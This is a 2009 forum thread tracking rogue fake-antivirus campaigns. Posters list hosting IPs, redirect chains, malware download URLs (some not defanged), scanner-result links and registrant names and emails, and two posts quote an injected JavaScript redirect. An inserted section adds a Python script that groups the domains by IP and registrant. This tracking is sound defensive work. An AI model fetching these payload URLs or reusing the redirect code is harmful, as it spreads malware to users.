Anubis (http://anubis.iseclab.org/?action=result&task_id=1215fa2c7ea1aa5f4b1c66741abfcbd9d)

Downloads:
Code: [Select]
hxxp://62.211.68.12/irbray/file.exe
hxxp://62.211.68.12/irbray/InternetAntivirusPro.exe
hxxp://xoomer.virgilio.it/irbray/file.exe
hxxp://xoomer.virgilio.it/irbray/InternetAntivirusPro.exe
hxxp://xoomer.alice.it/irbray/file.exe
http://xoomer.alice.it/irbray/InternetAntivirusPro.exe
VirusTotal (http://www.virustotal.com/analisis/04a0c6af71f5ee0f218761d5cd74e3bc) - 11/40 (27.5%)
VirusTotal (http://www.virustotal.com/analisis/7ce55acb9db85f064036eeead9528a4b) - 4/40 (10%)

94.75.209.11
Fake scanner pages:
Code: [Select]
http://scanner.rapidantivir09.com/33/
http://scanner.rapidantivir09.com/34/
http://scanner.rapidantivir09.com/35/
http://scanner.rapidantivir09.com/36/
http://scanner.rapidantivir09.com/37/
http://scanner.rapidantivir09.com/38/
http://scanner.rapidantivir09.com/39/
http://scanner.rapidantivir09.com/40/
http://scanner.rapidantivir09.com/41/

Redirection with software-traff[.]com/go.php?id=341&ref=1292
Wepawet (http://wepawet.iseclab.org/view.php?hash=b18ee854888e6d7157982901273f9b8b&t=1241483868&type=js)

Code: [Select]
hxxp://scanner.rapidantivir09.com/setup/install.exe
hxxp://scanner.rapidantivir09.com/setup/install_1096_MTI5MnwzNXwxMDAwMDAwMDAwfHx8fHx8fHw_.exe
VirusTotal: Trojan Banker (http://www.virustotal.com/analisis/f6e7fcdeb2d074200985a7b1fcb92626) - 26/39 (66.67%)

94.102.48.28
Fake scanner pages:
Code: [Select]
hxxp://virusinfocheck.com/1/?id=11-1&back=%3DzQ0yzT0MgQMMI%3D
hxxp://virusinfocheck.com/2/?id=11-1&back=%3DzQ0yzT0MgQMMI%3D
Payloads:
Code: [Select]
hxxp://virusinfocheck.com/download/Install_11-1.exe
VirusTotal (http://www.virustotal.com/analisis/25b9c330959cfd9102f5a3ff74d3b58d) - 4/40 (10%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=14feff9e5911c6a4455a8f7d3874e4632&format=html)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=e35e9965a701378bbfed38f35d2b4a4a)

HTTP Activity:
Quote
securedliveuploads.com:80 [83.133.123.140]
GET /?act=fb&1=0&2=0&3=kfddnffaffihlcoemdkedcaefcfaffedhfmdmboc&4=eebajfjafekaifnbddghoclg&5=22&6=1&7=63&8=31&9=0&10=1
Title: Re: Rogue - Fake AV
Post by: SysAdMini on May 05, 2009, 10:01:07 am
209.44.126.102

Code: [Select]
scan4mix.com

Registrant Bill Rader (mapegram@gmail.com)

Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 05, 2009, 03:15:29 pm
Redirects to rogue:

hxxp://litefront.cn/in.cgi?9 (not listed)
hxxp://clubmillionswow.cn/in.cgi?9  (not listed)
-->
hxxp://lemmydislikes.com/in.cgi?9
-->
hxxp://goworkscan.com/?uid=12724
-->
hxxp://scan4mix.com/?uid=12724

91.212.41.111
Code: [Select]
hxxp://litefront.cn/in.cgi?9
Wepawet (http://wepawet.iseclab.org/view.php?hash=3c5ac5252cd6d16846411dcf90ef4317&t=1241518643&type=js)

exploit related:
Quote
window.location=encodeURI("
hxxp://va.litefront.cn/in.cgi?9&tsk=id852-31mar09-r200&type=l&seoref="
+encodeURIComponent(document.referrer)
+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="
+encodeURIComponent(document.URL)
+"&default_keyword=XXX
");

91.212.41.96
Code: [Select]
hxxp://clubmillionswow.cn/in.cgi?9
exploit related:
Quote
window.location=encodeURI("
hxxp://ap.clubmillionswow.cn/in.cgi?9&tsk=id790-09apr09-r35&type=l&seoref="
+encodeURIComponent(document.referrer)
+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="
+encodeURIComponent(document.URL)
+"&default_keyword=XXX
");
Wepawet (http://wepawet.iseclab.org/view.php?hash=ccccd1393f158462d6fe73f983ba19b8&t=1241519347&type=js)

full injection (Google search) (http://www.google.com/search?source=ig&hl=en&q=%22clubmillionswow.cn%22)

Rogue:
78.159.115.215.internetserviceteam.com
Code: [Select]
hxxp://log4scan.info
hxxp://scan4log.info
hxxp://logscan4.info

Registrant Name: John Aschinger
Registrant Email: plutommy@ gmail.com

209.44.126.102
Code: [Select]
hxxp://scan4zoom.info
Registrant Name: Benn Tinkman
Registrant Email: bnntnkmn@ gmail.com
Code: [Select]
hxxp://scan4ray.com
hxxp://ray4scan.com
Registrant Name: Bill Rader
Registrant Email: mapegram@ gmail.com
VirusTotal (http://www.virustotal.com/analisis/39f5f183d801d69f84a1491d9f391818) - 8/41 (19.51%)

91.212.65.55
Code: [Select]
hxxp://globalsecurityscans.com/download.php
Registrant Name: Raymond Myles
Registrant Email: RaymondCMyles@ text2re.com
VirusTotal (http://www.virustotal.com/analisis/de7b36953c31f4086090ed3cb9e60a7f) - 14/40 (35.00%)

38.99.170.210
Code: [Select]
hxxp://vrusstatuscheck.com/1/?id=11-1
VirusTotal (http://www.virustotal.com/analisis/674a7ca96164adca6f7104740ef2babc) - 8/41 (19.51%)
Registrant Name: Atkinson L Nick
Registrant Email: immigration.beijing@ footer.cn

Redirects with:
your-guide-online.com
crytheriver.biz
awardspacelooksbig.us
Title: Re: Rogue - Fake AV
Post by: CkreM on May 07, 2009, 02:31:25 am
Fake AV:
Code: [Select]
trustedwebsecurity.com
Allowedwebsurfing.com

More on that IP as stated on DomainTools, but I couldn't find them.
Title: Re: Rogue - Fake AV
Post by: MysteryFCM on May 07, 2009, 02:50:29 am
http://hosts-file.net/pest.asp?show=209.44.126.
Title: Re: Rogue - Fake AV
Post by: CkreM on May 07, 2009, 03:52:44 am
http://hosts-file.net/pest.asp?show=209.44.126.
;D
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 09, 2009, 12:11:27 pm
;D go go go

209.44.126.102

Registrant Name: Bernhard Langer
Registrant Email: myscarbe@ gmail.com

atom4scan.info
fan4scan.info
lux4scan.info
mini4scan.info
scan4atom.info
scan4fan.info
scan4mini.info
scan4mix.info
scan4ray.info
scan4star.info

Registrant Name: Carl Marcus
Registrant Email: brmargul@ gmail.com

fanscan4.com
rayscan4.com

Registrant Name: Thomas Fergerson
Registrant Email: telerdomb@ gmail.com

scan6list.com

********************

78.159.115.216

Registrant Name: Thomas Fergerson
Registrant Email: telerdomb@ gmail.com

fuse6scan.com
way6scan.com

Registrant Name: Lois Kiltz
Registrant Email: loiskiltz@ gmail.com

fusescan6.com

Registrant Name: Emile Plaas
Registrant Email: eplaas@ gmail.com

listscan6.info

****************

38.105.19.27

Registrant Name: Lois Kiltz
Registrant Email: loiskiltz@ gmail.com

open6scan.com
scan6fuse.com
scan6open.com

(http://img93.imageshack.us/img93/2710/goscan.jpg)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 09, 2009, 01:04:15 pm
69.4.230.204 [iad2-virt5.liquidgravity.com]
78.47.91.153 [static.153.91.47.78.clients.your-server.de]
212.117.165.126
38.99.170.9

Code: [Select]
hxxp://fullantispywarescan.com/1/?id=11-1&smersh=bdf6da8d5&back==TQ1wDT3MUQOMI=N
hxxp://fullantispywarescan.com/download.php?id=11-1
Wepawet (http://wepawet.iseclab.org/view.php?hash=25018b10fde56f3eedfc660e3d80627a&t=1241873146&type=js)
VirusTotal (http://www.virustotal.com/analisis/dc0b3fa70bb28e26746ffbfe804ff0cf) - 7/40 (17.5%)

connection to 83.133.123.140
Quote
hxxp://momentstohaveyou.cn/?act=fb&1=0&2=0&3=kfddnffaffihlcoemdkedcaefcfaffedhfmdmboc&4=eebajfjafekaifnbddghoclg&5=22&6=1&7=63&8=31&9=0&10=1
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=9c9ccc9da8b1389314f1b29d177e59cd)
http://www.malwaredomainlist.com/mdl.php?search=momentstohaveyou.cn&colsearch=All&quantity=50 (http://www.malwaredomainlist.com/mdl.php?search=momentstohaveyou.cn&colsearch=All&quantity=50)

another on 38.99.170.9 with the same file
Code: [Select]
hxxp://proantivirusscanv3.com
hxxp://proantivirusscanv3.com/1/?id=11-1&smersh=bdf6da8d5&back==jQ01jT4McQMMI=N
hxxp://proantivirusscanv3.com/download.php?id=11-1

Wepawet (http://wepawet.iseclab.org/view.php?hash=1db805d04279e506da74e6183d55ece4&t=1241873009&type=js)
redirection by liveavantbrowser2[.]cn

209.44.126.22
Code: [Select]
hxxp://securityexamination.com
hxxp://securityexamination.com/download.php?affid=00000
hxxp://securityexamination.com/in.php?url=5&affid=00000
Wepawet (http://wepawet.iseclab.org/view.php?hash=70cfc73e817040683aa56c1aa88f3dc0&t=1241755339&type=js)
VirusTotal (http://www.virustotal.com/analisis/e5c4f14a9a46fa3f0b54c8d3fb5a0615) - 17/40 (42.50%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=150a4314291818e64750c1e8e92421d50)

Code: [Select]
hxxp://webbrowsersecurity.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=b8c41a78a4d9ca14d314d80bfe2f2c40&t=1241873976&type=js)

209.44.126.241
Code: [Select]
hxxp://fullvirusprotection.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=1128892f84978a1c80f6f384e5aab015&t=1241830338&type=js)

95.129.144.236
Code: [Select]
hxxp://freewebmypcscan.com
hxxp://freewebmypcscan.com/install.exe
Wepawet (http://wepawet.iseclab.org/view.php?hash=28396d5ed27d1248836e63de387748a8&t=1241684545&type=js)
VirusTotal (http://www.virustotal.com/analisis/28d7a81181ccbfdd196d79cb0e0ced2d) - 11/39 (28.21%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1fa2223f7b9e02ef4d9e42ac33c8d0030)

connection with 217.112.94.230  [217-112-94-230.static.as29550.net]

Quote
217.112.94.230:80 - [winbestsoftdownload.com]
Request: GET /winav.exe
Code: [Select]
hxxp://winbestsoftdownload.com/winav.exe

VirusTotal (http://www.virustotal.com/analisis/802f269926e93a1eeafbf20ca2820ff3) - 10/41 (24.39%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=19021c3b563efce7485110b91b826514e&call=first)

91.212.65.55
Code: [Select]
hxxp://webeyesecurity.com

Fraudulent payment system:
194.165.4.77
Code: [Select]
hxxp://securebill09.com/pp/
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 09, 2009, 08:11:52 pm
209.44.126.241

Code: [Select]
hxxp://xvirusdescan.com
hxxp://fullvirusprotection.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=8dd57672c729dcd920ea55b229e2556d&t=1241889688&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=1128892f84978a1c80f6f384e5aab015&t=1241830338&type=js)
Title: Re: Rogue - Fake AV
Post by: CkreM on May 10, 2009, 11:40:53 pm
Fake AV:
Code: [Select]
videoporntrue.com/scan/?id=260
winpcdefender09.com
seems like the control panel login or something like that
Code: [Select]
av-cash.com
Title: Re: Rogue - Fake AV
Post by: CkreM on May 11, 2009, 03:39:36 am
Fake AV:
Code: [Select]
ia-pro.com
iantivirus-pro.com
iantiviruspro.com
scanfan4.info
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 11, 2009, 11:25:22 am
209.44.126.102

Code: [Select]
mix4scan.info
ray4scan.info
scanatom4.info
scanmini4.info
scanmix4.info
scanray4.info
scanstar4.info
star4scan.info

Registrant Name: Bernhard Langer
Registrant Email: myscarbe@ gmail.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 11, 2009, 11:39:19 am
Redirects to Rogue
91.212.41.110
Code: [Select]
hxxp://islandtravet.cn/in.cgi?6
Wepawet (http://wepawet.iseclab.org/view.php?hash=94891451f027edde27292ef96b77770f&t=1241704846&type=js)
Title: Re: Rogue - Fake AV
Post by: MysteryFCM on May 11, 2009, 11:46:29 am
DD URLs for the ones MWT posted :)

Code: [Select]
http://mix4scan.info/download/install.exe
http://ray4scan.info/download/install.exe
http://scanatom4.info/download/install.exe
http://scanmini4.info/download/install.exe
http://scanmix4.info/download/install.exe
http://scanray4.info/download/install.exe
http://scanstar4.info/download/install.exe
http://star4scan.info/download/install.exe
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 11, 2009, 03:49:14 pm
two other redirects:

Code: [Select]
hxxp://yrapyatnica.com/in.cgi?6
hxxp://nextfreedollar.com/in.cgi?6
Wepawet (http://wepawet.iseclab.org/view.php?hash=5dfce7a8e2e25b696ba07d0d1c1031cf&t=1242057348&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=3cd653c62f186d10412e048002d15cf6&t=1242055737&type=js)

Domain name: yrapyatnica[.]com
Registrant:
    Sergej Diskov
    Email: unik-k@ mail.ru

Domain name: nextfreedollar[.]com
Registrant:
    Vadim Kamenskij
    Email: vadik523@ mail.ru
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 11, 2009, 05:12:08 pm
78.47.91.153 [static.153.91.47.78.clients.your-server.de]
212.117.165.126
38.99.170.9


redirects with liveavantbrowser2[.]cn

Code: [Select]
hxxp://computerscanv1.com/1/?id=11-1&smersh=33a8c6a42&back=%3DTQxyTjwMYQMMI%3DO
hxxp://computerscanv1.com/download.php?id=11-1
VirusTotal (http://www.virustotal.com/analisis/0ccef7ef8bf49b07a47448c01480fef4) - 0/40 (0.00%) !!
Wepawet (http://wepawet.iseclab.org/view.php?hash=1db805d04279e506da74e6183d55ece4&t=1242061730&type=js)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1a5a14d03dde85004616e00cbb0cdda31)
connection to 83.133.123.140:80 - [momentstohaveyou.cn]

Registrant: Kayan M Aslan (info@ dmf.com.tr)
Title: Re: Rogue - Fake AV
Post by: CkreM on May 12, 2009, 04:23:41 pm
Fake AV:
Code: [Select]
my-xtube.com/promo3/
free-porn-host.com/promo3/
fuck-me-pumps.com/promo3
hot-tube-tuberzzz.net/promo3/
xmovies-central.com/promo3/
top-porn-tubes.com/promo3/
my-fuck-movies.com/promo3/
youtube-xmovies.com/promo3/
yourporn-xmovies.com/promo3/
Title: Re: Rogue - Fake AV
Post by: MysteryFCM on May 12, 2009, 04:34:41 pm
http://virusscan.jotti.org/en/scanresult/64ca4b6124c23fcaeaa335a5eccae920ed3b02bf
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 13, 2009, 07:00:17 pm
Rogue
209.44.126.22
Code: [Select]
hxxp://websecuritypolice.com/download.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=53991bfa0cda6c879bf65595cdc0bcef&t=1242235516&type=js)
Registrant Name: Dorothy Rodarte
Registrant Email: DorothyDRodarte@ text2re.com

Rogue
209.44.126.102
Code: [Select]
hxxp://rankscan4.info/download/install.php
hxxp://scan4rank.info/download/install.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=f4da94d9f0db6e1ed1260be0075a8d8f&t=1242239109&type=js)
Registrant Name: John Redwine
Registrant Email: mexnacc@ gmail.com

Redirects to Rogue
209.44.126.102
Code: [Select]
hxxp://goscanrank.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=9b624b4ecfdba2a1a71b03e916618b96&t=1242238838&type=js)
Registrant Name: Francesco Carpa
Registrant Email: alcnafuch@ gmail.com

Rogue
209.44.126.241
Code: [Select]
hxxp://intellectsecurityshield.com/download.php
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=5681897bb58fbef190db73f66722b92b&t=1242174215&type=js)
Registrant Name: Buste Ridges
Registrant Email: gregorbentley@ gmail.com
Title: Re: Rogue - Fake AV
Post by: MysteryFCM on May 13, 2009, 07:14:19 pm
goscanrank.com redirects to;

http://key4scan.info/download/index.php
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 16, 2009, 12:17:33 am
209.44.126.102
Code: [Select]
hxxp://scantop4.com/download/install.php
hxxp://top4scan.com/download/install.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=a66d639c66db4800c5d00bbfd790cd48&t=1242399035&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=a412e5855a008e20186b231e3c859279&t=1242399249&type=js)
Registrant Name: Greg Litton
Registrant Email: ansouthe@ gmail.com

209.44.126.241
Code: [Select]
hxxp://initpcsecurityscan.com/download.php
hxxp://bestwebscantools.com/download.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=61e575d65c20e6efca4a12219eadc179&t=1242431132&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=348f60b37d76ef2b119e354d5cc7d93d&t=1242432991&type=js)
WHOIS Privacy Protection

84.16.244.116 [84.16.244.116.internetserviceteam.com]
Code: [Select]
hxxp://zerocleaner.com/download.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=f51c573425dd515e6bd470b13730d0aa&t=1242430465&type=js)
WHOIS Privacy Protection

194.165.4.39 (Rogue PrivacyCenter)
Code: [Select]
hxxp://privacy-tools-pack.com/install.exe
hxxp://privacy-center.org/install.exe
hxxp://privacy-centar.org/install.exe
VirusTotal (http://www.virustotal.com/analisis/38a176c40a92a2a3b0c382d133c59cce) - 24/40 (60.00%)

Registrant Name: Artur Polilov
Registrant Email: prv54@ lycos.com

Registrant Name: Artur Maksimov
Registrant Email: contact@ privacy-center.org

Registrant Name: Pavel Antonov
Registrant Email: acapz@ freebbmail.com

194.165.4.39 Malware urls
Code: [Select]
hxxp://privacyupdate447.com/avail
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=242db3b60789080d22fe0f7be32fbfb0)
Registrant Name: Artur Polilov
Registrant Email: prv54@ lycos.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 16, 2009, 06:53:05 pm
209.44.126.22

Code: [Select]
hxxp://superiorinternetsecurity.com/download.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=2beffa5dc402aa091fc2c4275d429e38&t=1242500484&type=js)
VirusTotal (http://www.virustotal.com/analisis/0222f1fb178f3c083b83491dedcdec32) - 5/40 (12.5%)

Registrant name: Albert Figler
Registrant email: AlbertPFigler@ text2re.com
Title: Re: Rogue - Fake AV
Post by: CkreM on May 18, 2009, 03:57:31 am
Fake AV:
Code: [Select]
tubeonporn09.com/scan/
the downloaded file:
Code: [Select]
tubeonporn09.net/codec.exe
http://www.virustotal.com/analisis/598cca0715b74d459973cef0b73b1308
Same file on different domain:
Code: [Select]
rakompoporyadkunazaryadku.com/codec.exe
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 19, 2009, 03:36:31 pm
209.44.126.102

Code: [Select]
hxxp://zone4scan.info/download.php
hxxp://scanzone4.info/download.php
hxxp://zonescan4.info/download.php
hxxp://scan4one.info/download.php
hxxp://scanrank4.info/download.php
hxxp://rank4scan.info/download.php
Registrant: John Redwine / mexnacc@ gmail.com
Code: [Select]
hxxp://scan4gen.com/download.php
hxxp://notescan4.com/download.php
hxxp://note4scan.com/download.php
hxxp://metascan4.com/download.php
Registrant: Alan Ladd / exmcon@ gmail.com
Code: [Select]
hxxp://scantop4.info/download.php
hxxp://scan4top.info/download.php
hxxp://topscan4.info/download.php
hxxp://starscan4.info/download.php
hxxp://rayscan4.info/download.php
hxxp://mixscan4.info/download.php
Registrant: Edmund Moss / finewnrk@ gmail.com
Code: [Select]
hxxp://scan4meta.com/download.php
Registrant: Greg Litton / ansouthe@ gmail.com 
VirusTotal (http://www.virustotal.com/analisis/a1772ea28ab9dbfba18ab60f0dd83f16)

209.44.126.103
Code: [Select]
hxxp://genscan4.com/download.php
Registrant: Alan Ladd / exmcon@ gmail.com

redirects
209.44.126.103
Code: [Select]
hxxp://goscangen.com
hxxp://goonescan.com
hxxp://gopagescan.com
Registrant: Claudio Canella / tanehen@ gmail.com 
Code: [Select]
hxxp://goscanmany.com
hxxp://goscanzone.com
hxxp://goscanwide.com
Registrant: Gianluce Baruzi / chirelqas@ gmail.com
Code: [Select]
hxxp://goscanone.com
hxxp://goscanpage.com
Registrant: Enrico Schiru / canrcnad@ gmail.com
Code: [Select]
hxxp://gomanyscan.com
hxxp://gowidescan.com
Registrant: Francesco Carpa / alcnafuch@ gmail.com

84.16.244.113 - 84.16.244.113.internetserviceteam.com
Code: [Select]
hxxp://0scan.us/download.php
VirusTotal (http://www.virustotal.com/analisis/f54e334ef43cc78d92eb175c30e8bbd3) - 6/39 (15.38%)
Registrant: James Nitton / uuuuu@ ua.fm

84.16.244.114 - 84.16.244.114.internetserviceteam.com
Code: [Select]
hxxp://internetsafetyscan.com/download.php
VirusTotal (http://www.virustotal.com/analisis/92894fa347a0aea20531a46ef4c23b25) - 7/37 (18.92%)
Registrant: Peter Hicks / PeterJHicks@ text2re.com

66.63.167.50 - 50.167.63.66.oc3networks.com 
Code: [Select]
hxxp://xpsecuritysp3.com
hxxp://xpsecuritycentral.com
hxxp://xpsecurityoffice.com
hxxp://xpsecurityhome.com
Registrant:
Kirill Vlasov / vlasov@ interlayer.net
Kirill Vlasov / vlasov@ interlayer.net
Alexander Zolotov / zolotov@ laptopmix.net
Alexander Zolotov / zolotov@ laptopmix.net

38.99.170.9
Code: [Select]
hxxp://malwareliveproscanv1.com/1/?id=2004&smersh=04ae150da&back=%3DjQ0xjj3MIQNMI%3DN
VirusTotal (http://www.virustotal.com/analisis/e0e6c627ae6417bcf3667b620ec3b50d) - 0/40 (0.00%)
Registrant: Fabian Q Mister / fabian@ ingenovate.com

209.44.126.22
redirects
Code: [Select]
hxxp://securityonlineworld.com/in.php
hxxp://securityonlineworld.com/hitin.php

fake scanner page
Code: [Select]
hxxp://securityonlineworld.com/scan.php
hxxp://securityonlineworld.com/scanonline.php
hxxp://securityonlineworld.com/page.php
hxxp://securityonlineworld.com/page2.php
hxxp://securityonlineworld.com/page3.php

payload
Code: [Select]
hxxp://securityonlineworld.com/download.php

VirusTotal (http://www.virustotal.com/analisis/c0da590a14bb9dac4ddd6d4a8ae45700) - 9/40 (22.5%)
Registrant: Patricia Fields / PatriciaMFields@ text2re.com
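The post above groups domains by hosting IP and by registrant e-mail, which is the pivot that ties the scan*4.info and go*scan.com families to the same operator across 209.44.126.102 and .103. The script below is an added example, not code from this thread or from MDL: it parses an excerpt written in the same posting style (IP line, defanged hxxp:// URLs with "[.]", then "Registrant: Name / user@ host" for the domains above it) and does that grouping automatically. The sample excerpt is constructed from values in the posts; the line layout, the regular expressions and the refanging rules are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed excerpt in the thread's posting style (hosting IP line, defanged
# URLs, then "Registrant: Name / e-mail" claiming the domains listed above it).
# Values are copied from posts in this thread; the layout is an assumption.
SAMPLE_POST = """\
209.44.126.102
hxxp://zone4scan.info/download.php
hxxp://scanzone4.info/download.php
Registrant: John Redwine / mexnacc@ gmail.com
hxxp://scan4gen.com/download.php
Registrant: Alan Ladd / exmcon@ gmail.com
209.44.126.103
hxxp://genscan4.com/download.php
Registrant: Alan Ladd / exmcon@ gmail.com
hxxp://goscangen.com
Registrant: Claudio Canella / tanehen@ gmail.com
89.149.210.154 [89-149-210-154.internetserviceteam.com]
hxxp://jasovsk[.]cn/bestway.js
Registrant: cndomains@ thirddor.info
"""

IP_LINE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\b")
URL_LINE = re.compile(r"^(?:hxxp|xttp)s?://", re.IGNORECASE)
REG_LINE = re.compile(r"^Registrant(?: Name)?:\s*(?:(.+?)\s*/\s*)?(\S+@\s*\S+)$")


def refang(value):
    """Undo the defanging used in the thread: hxxp://, xttp://, [.], 'user@ host'."""
    value = re.sub(r"^(?:hxxp|xttp)", "http", value, flags=re.IGNORECASE)
    return value.replace("[.]", ".").replace("@ ", "@")


def parse_post(text):
    """Group domains by hosting IP and by registrant e-mail.

    Returns (by_ip, by_registrant), both dicts of sets. A Registrant line
    claims every domain listed since the previous Registrant line.
    """
    by_ip = defaultdict(set)
    by_registrant = defaultdict(set)
    current_ip = None
    pending = []  # domains listed since the last Registrant line
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = IP_LINE.match(line)
        if m:
            current_ip = m.group(1)
            continue
        if URL_LINE.match(line):
            host = urlparse(refang(line)).hostname
            if host:
                pending.append(host)
                if current_ip:
                    by_ip[current_ip].add(host)
            continue
        m = REG_LINE.match(line)
        if m:
            email = refang(m.group(2)).lower()
            by_registrant[email].update(pending)
            pending = []
    return dict(by_ip), dict(by_registrant)


def registrant_to_ips(by_ip, by_registrant):
    """The pivot the thread does by hand: which hosting IPs each registrant spans."""
    return {
        email: {ip for ip, hosts in by_ip.items() if domains & hosts}
        for email, domains in by_registrant.items()
    }


if __name__ == "__main__":
    by_ip, by_reg = parse_post(SAMPLE_POST)
    for ip, hosts in sorted(by_ip.items()):
        print(ip, sorted(hosts))
    for email, ips in sorted(registrant_to_ips(by_ip, by_reg).items()):
        print(email, sorted(ips))
```

Run it on a saved post and the registrant-to-IP map is what to block or watch next: an e-mail that spans two hosting IPs (exmcon@ gmail.com across .102 and .103 in the sample) is the operator, and new domains registered to it will land on the same boxes.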
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 19, 2009, 04:47:56 pm
209.44.126.22
Code: [Select]
http://securityonlinedirect.com/download.php
http://securityonlinedirect.com/install/ws.exe
VirusTotal (http://www.virustotal.com/analisis/a4bc00b340855bcebbd1134fc9b23848) - 10/40 (25%)
VirusTotal (http://www.virustotal.com/analisis/160fd610babe1e5530e1286335335d24) - 7/39 (17.95%)
Registrant: Andrew Vadlamudi / AndrewGVadlamudi@ text2re.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 23, 2009, 06:07:21 pm
AS10929 (NETELLIGENT)

209.44.126.22
Code: [Select]
hxxp://webcamsafety.com/download.php
hxxp://webcamsafety.com/install/ws.exe
VirusTotal (http://www.virustotal.com/analisis/59b3c658c4612795702a862e6d44e0d7b0eee83b93e00e5ae53076342689f18a-1243095881) - 5/40 (12.50%)
VirusTotal (http://www.virustotal.com/analisis/e482c46dcd7fdbb62216499673910df822bb1735d8f8793a6fa70d7c0767ee29-1243095882) - 4/35 (11.43%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=18331ed14776995e115a816263126abf&t=1243096404&type=js)
Registrant: Irene Mccord / irene.e.mccord@ trashymail.com

209.44.126.36
Code: [Select]
hxxp://websecuritybasics.com/download.php
hxxp://websecuritybasics.com/install/ws.exe
VirusTotal (http://www.virustotal.com/analisis/60f6d79183e94f1b2c1517239b2a40cd2cc18fc06ae3793258d896f85b55d34f-1243046741) - 8/40 (20.00%)
VirusTotal (http://www.virustotal.com/analisis/843076d02eb0149f2a4e6786a577f92c615f9bdc1b69c09251dbbbf072885783-1243046741) - 8/40 (20.00%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=557c84a5e43fd99cf8df69a398ff0f5a&t=1243047155&type=js)
Registrant: Joanne Liddell / zozo@ gmail.com

209.44.126.102
Code: [Select]
hxxp://scan4meta.info
hxxp://meta4scan.info
hxxp://metascan4.info
Wepawet (http://wepawet.iseclab.org/view.php?hash=d3555c5af1c134c8ed0fc3d2f2a017b8&t=1243056163&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=b25a43a88fe453cd450ff0234f1bbf5f&t=1243056673&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=fcc476116d9d14ed9ecc99107d43ca28&t=1243057736&type=js)
Registrant: Enrico Schiru / canrcnad@ gmail.com
Registrant: Edmund Moss / finewnrk@ gmail.com
Registrant: Edmund Moss / finewnrk@ gmail.com

AS47867 (UKNETCOM)

91.212.132.10
Code: [Select]
hxxp://tubes-host.com/promo1/get.php
hxxp://xtubes-host.com/promo1/get.php
hxxp://xtube-xmovie.com/promo1/get.php

91.212.132.12
Code: [Select]
hxxp://free-antivirus-engine.com/promo1/get.php
hxxp://hot-porn-tubes.com/promo1/get.php
hxxp://my-porn-archive.com/promo1/get.php
hxxp://porn-tubes-world.com/promo1/get.php
hxxp://xmovies-downloads.com/promo1/get.php
hxxp://youporn-for-free.com/promo1/get.php
hxxp://secure-center-antivirus.com/promo1/get.php
hxxp://free-porn-xmovies.com/promo1/get.php
hxxp://free-antivirus-tools.com/promo1/get.php
hxxp://free-xtube.com/promo1/get.php
hxxp://fresh-xxx-movies.com/promo1/get.php
VirusTotal (http://www.virustotal.com/analisis/fbe399f81083aee112ececec51a33057) - 13/39 (33.33%)

AS29131 (RAPIDSWITCH)

78.129.166.166
Code: [Select]
hxxp://porn-hub-xmovies.com/promo1/get.php
hxxp://free-xtubes-host.com/promo1/get.php
hxxp://antovirus-pro.com/promo1/get.php
hxxp://antispyware-center.com/promo1/get.php
hxxp://my-xxx-video.com/promo1/get.php
hxxp://xtube-downloads.com/promo1/get.php
hxxp://porn-movies-central.com/promo1/get.php

AS30083 (SERVER4YOU)

69.64.33.242  [air099.startdedicated.com]
Code: [Select]
hxxp://antivirus-cs1.com
hxxp://antivirus-cs2.com
hxxp://antivirus-cs3.com
hxxp://antivirus-cs4.com
hxxp://antivirus-cs5.com
hxxp://antivirus-cs6.com
hxxp://antivirus-cs7.com
hxxp://antivirus-cs8.com
hxxp://antivirus-cs9.com
hxxp://antivirus-cs10.com
hxxp://antivirus-cs11.com
hxxp://antivirus-cs12.com
hxxp://antivirus-cs13.com
hxxp://antivirus-cs14.com
hxxp://antivirus-cs15.com
Registrant: Enrique Perez / webmaster@ software-mall.com

Code: [Select]
hxxp://2009system-cleaner.com
hxxp://advanced-anti-virus.com
hxxp://antimalwarewarrior2009.com
hxxp://antivirusmaster2009.com
hxxp://e-spy-punisher.com
hxxp://killallspywares2009.com
hxxp://malware-preventer.com
hxxp://malware-remover2008.com
hxxp://megantivirus2009.com
hxxp://micro-adware-cops.com
hxxp://micro-antivirus2008.com
